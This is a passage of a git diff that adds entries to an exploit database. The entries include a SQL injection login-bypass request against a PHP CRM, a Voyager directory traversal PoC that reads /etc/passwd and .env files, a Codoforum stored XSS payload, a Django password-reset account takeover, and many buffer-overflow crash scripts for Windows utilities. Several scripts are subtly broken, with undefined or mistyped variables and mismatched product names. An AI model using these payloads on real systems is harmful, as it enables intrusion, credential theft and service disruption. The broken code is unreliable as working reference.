Referer: http://10.0.0.214/Small%20CRM%20Projects%20Using%20PHP%20and%20MySQL/crm/admin/index.php
|
||||||
|
Cookie: PHPSESSID=k5845lo7s90it5p33js75665jq
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&login=
|
50
exploits/php/webapps/47875.txt
Normal file
50
exploits/php/webapps/47875.txt
Normal file
|
@ -0,0 +1,50 @@
|
||||||
|
# Exploit Title: Voyager 1.3.0 - Directory Traversal
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: January 2020-01-06
|
||||||
|
# Exploit Author: NgoAnhDuc
|
||||||
|
# Vendor Homepage: https://voyager.devdojo.com/
|
||||||
|
# Software Link:https://github.com/the-control-group/voyager/releases/tag/v1.3.0https://github.com/the-control-group/voyager/releases/tag/v1.2.7
|
||||||
|
# Version: 1.3.0 and bellow
|
||||||
|
# Tested on: Ubuntu 18.04
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerable code is in voyager/src/Http/Controllers/VoyagerController.php
|
||||||
|
|
||||||
|
========================================
|
||||||
|
|
||||||
|
public function assets(Request $request)
|
||||||
|
{
|
||||||
|
*$path = str_start(str_replace(['../', './'], '',
|
||||||
|
urldecode($request->path)), '/');*
|
||||||
|
* $path = base_path('vendor/tcg/voyager/publishable/assets'.$path);*
|
||||||
|
if (File::exists($path)) {
|
||||||
|
$mime = '';
|
||||||
|
if (ends_with($path, '.js')) {
|
||||||
|
$mime = 'text/javascript';
|
||||||
|
} elseif (ends_with($path, '.css')) {
|
||||||
|
$mime = 'text/css';
|
||||||
|
} else {
|
||||||
|
$mime = File::mimeType($path);
|
||||||
|
}
|
||||||
|
$response = response(File::get($path), 200,
|
||||||
|
['Content-Type' => $mime]);
|
||||||
|
$response->setSharedMaxAge(31536000);
|
||||||
|
$response->setMaxAge(31536000);
|
||||||
|
$response->setExpires(new \DateTime('+1 year'));
|
||||||
|
return $response;
|
||||||
|
}
|
||||||
|
return response('', 404);
|
||||||
|
}
|
||||||
|
========================================
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
|
||||||
|
passwd:
|
||||||
|
|
||||||
|
http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2Fetc/passwd
|
||||||
|
|
||||||
|
|
||||||
|
Laravel environment
|
||||||
|
file:http://localhost/admin/voyager-assets?path=.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F.....%2F%2F%2F<web
|
||||||
|
root dir>/.env
|
22
exploits/php/webapps/47876.txt
Normal file
22
exploits/php/webapps/47876.txt
Normal file
|
@ -0,0 +1,22 @@
|
||||||
|
# Exploit Title: Codoforum 4.8.3 - Persistent Cross-Site Scripting
|
||||||
|
# Google Dork: intext:"Powered by Codoforum"
|
||||||
|
# Date: 2020-01-03
|
||||||
|
# Exploit Author: Prasanth c41m, Vyshnav Vizz
|
||||||
|
# Vendor Homepage: https://codoforum.com/index.php
|
||||||
|
# Software Link: https://codoforum.com/buy
|
||||||
|
# Version: Codoforum 4.8.3
|
||||||
|
# Tested on: [relevant os]
|
||||||
|
# CVE : [if applicable]
|
||||||
|
# source: https://medium.com/@c41m/b2e1133c6a91?
|
||||||
|
|
||||||
|
Codoforum is prone to a stored xss vulnerability.
|
||||||
|
An attacker can exploit this issue to creating user with payload and perform cross-site scripting attacks.
|
||||||
|
Codoforum version 4.8.3 is vulnerable.
|
||||||
|
|
||||||
|
1. Install Codoforum 4.8.3 in a local server.
|
||||||
|
2. Goto http://localhost/index.php?u=/user/register
|
||||||
|
3. Create a user using :-
|
||||||
|
username : "><svg/onload=alert(1)>
|
||||||
|
password : password
|
||||||
|
email : c41m@email.com
|
||||||
|
4. Now goto http://localhost/admin/index.php?page=users/manage, an XSS alert popup will be triggered here.
|
31
exploits/python/webapps/47879.md
Normal file
31
exploits/python/webapps/47879.md
Normal file
|
@ -0,0 +1,31 @@
|
||||||
|
EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47879.zip
|
||||||
|
|
||||||
|
|
||||||
|
# django_cve_2019_19844_poc
|
||||||
|
PoC for [CVE-2019-19844](https://www.djangoproject.com/weblog/2019/dec/18/security-releases/)
|
||||||
|
|
||||||
|
# Requirements
|
||||||
|
|
||||||
|
- Python 3.7.x
|
||||||
|
- PostgreSQL 9.5 or higher
|
||||||
|
|
||||||
|
## Setup
|
||||||
|
|
||||||
|
1. Create database(e.g. `django_cve_2019_19844_poc`)
|
||||||
|
1. Set the database name to the environment variable `DJANGO_DATABASE_NAME`(e.g. `export DJANGO_DATABASE_NAME=django_cve_2019_19844_poc`)
|
||||||
|
1. Run `pip install -r requirements.txt && ./manage.py migrate --noinput`
|
||||||
|
1. Create the following user with `shell` command:
|
||||||
|
|
||||||
|
```python
|
||||||
|
>>> from django.contrib.auth import get_user_model
|
||||||
|
>>> User = get_user_model()
|
||||||
|
>>> User.objects.create_user('mike123', 'mike@example.org', 'test123')
|
||||||
|
```
|
||||||
|
|
||||||
|
## Procedure For Reproducing
|
||||||
|
|
||||||
|
1. Run `./manage.py runserver`
|
||||||
|
1. Open `http://127.0.0.1:8000/accounts/password-reset/`
|
||||||
|
1. Input `mıke@example.org` (Attacker's email), and click send button
|
||||||
|
1. Receive email (Check console), and reset password
|
||||||
|
1. Login as `mike123` user
|
33
exploits/windows/dos/47848.py
Executable file
33
exploits/windows/dos/47848.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install NetShareWatcher
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.NetShareWatcher Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47853.py
Executable file
33
exploits/windows/dos/47853.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install BlueAuditor
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.BlueAuditor Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47855.py
Executable file
33
exploits/windows/dos/47855.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install BlueAuditor
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.BlueAuditor Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47856.py
Executable file
33
exploits/windows/dos/47856.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install Dnss
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.Dnss Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47857.py
Executable file
33
exploits/windows/dos/47857.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/blueauditor_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install BlueAuditor
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.BlueAuditor Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47859.py
Executable file
33
exploits/windows/dos/47859.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install ShareAlarmPro
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.ShareAlarmPro Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47860.py
Executable file
33
exploits/windows/dos/47860.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install NetShareWatcher
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.NetShareWatcher Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47861.py
Executable file
33
exploits/windows/dos/47861.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/networksleuth_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install Dnss
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.Dnss Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
28
exploits/windows/dos/47862.py
Executable file
28
exploits/windows/dos/47862.py
Executable file
|
@ -0,0 +1,28 @@
|
||||||
|
# Exploit Title: TextCrawler Pro3.1.1 - Denial of Service (PoC)
|
||||||
|
# Date: 2020-05-01
|
||||||
|
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
|
||||||
|
# Software Link: https://www.digitalvolcano.co.uk/download/TextCrawlerPro=setup.exe
|
||||||
|
# Exploit Author: Achilles
|
||||||
|
# Tested Version: 3.1.1
|
||||||
|
# Tested on: Windows 7 x64
|
||||||
|
|
||||||
|
|
||||||
|
# 1.- Run python code :TextCrawler.py
|
||||||
|
# 2.- Open EVIL.txt and copy content to clipboard
|
||||||
|
# 3.- Open TextCrawler Pro
|
||||||
|
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
|
||||||
|
# 5.- Click 'Activate' and you will see a crash.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
buffer =3D "\x41" * 6000
|
||||||
|
|
||||||
|
try:
|
||||||
|
open("Evil.txt","w")
|
||||||
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print "[+] File created!"
|
||||||
|
except:
|
||||||
|
print "File cannot be created"
|
33
exploits/windows/dos/47863.py
Executable file
33
exploits/windows/dos/47863.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install RemShutdown
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.RemShutdown Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47864.py
Executable file
33
exploits/windows/dos/47864.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install Backup Key Recovery
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.Backup Key Recovery Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47865.py
Executable file
33
exploits/windows/dos/47865.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install RemShutdown
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.RemShutdown Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47866.py
Executable file
33
exploits/windows/dos/47866.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install NBMonitor
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Key' and click on 'Ok'
|
||||||
|
6.NBMonitor Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
63
exploits/windows/dos/47867.py
Executable file
63
exploits/windows/dos/47867.py
Executable file
|
@ -0,0 +1,63 @@
|
||||||
|
# Exploit Title: Office Product Key Finder 1.5.4 - Denial of Service (PoC)
|
||||||
|
# Date: 2020-01-06
|
||||||
|
# Vendor Homepage: http://www.nsauditor.com/
|
||||||
|
# Software Link: http://www.nsauditor.com/downloads/officeproductkeyfinder_setup.exe
|
||||||
|
# Exploit Author: Gokkul
|
||||||
|
# Tested Version: v1.5.4
|
||||||
|
# Tested on: Windows 7 x64
|
||||||
|
|
||||||
|
# Software Description:
|
||||||
|
# Office Product Key Finder is offline product key finder software and allows to recover and
|
||||||
|
# find microsoft office 25 character product key for Microsoft Office 2013, Microsoft Office 2010,
|
||||||
|
# Microsoft Office 2007 and Microsoft Office 2003 installed on your PC or on network computers.
|
||||||
|
|
||||||
|
|
||||||
|
# 1.- Download and install Office Product Key Finder
|
||||||
|
# 2.- Run python code : Office Product Key Finder.py
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
DoS=("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
|
||||||
|
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
|
||||||
|
|
||||||
|
myfile=open('CRASHER.txt','w')
|
||||||
|
myfile.writelines(Dos)
|
||||||
|
